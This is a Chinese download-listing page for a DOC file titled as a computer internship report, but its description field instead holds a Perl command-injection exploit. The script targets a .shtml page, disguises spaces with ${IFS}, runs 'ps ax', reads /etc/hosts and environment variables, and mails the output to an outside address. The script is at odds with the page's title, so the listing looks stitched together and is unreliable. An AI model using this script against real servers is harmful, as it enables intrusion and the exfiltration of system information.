计算机实习报告心得与体验

时间:2013-03-22 15:06:42
【文件属性】:

文件名称:计算机实习报告心得与体验

文件大小:88KB

文件格式:DOC

更新时间:2013-03-22 15:06:42

实习报告

#!/usr/bin/perl $URL='http://dtp.kappa.ro/a/test.shtml'; # please _DO_ _modify_ this $EMAIL='pdoru@pop3.kappa.ro,root'; # please _DO_ _modify_ this if ($ARGV[0]) { $CMD=$ARGV[0];}else{ $CMD="(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)\|mail ${EMAIL} -sanothe re_one"; }$text="${URL}/;IFS=\8;${CMD};echo|";$text =~ s/ /\$\{IFS\}/g;#print "$text\ n";


网友评论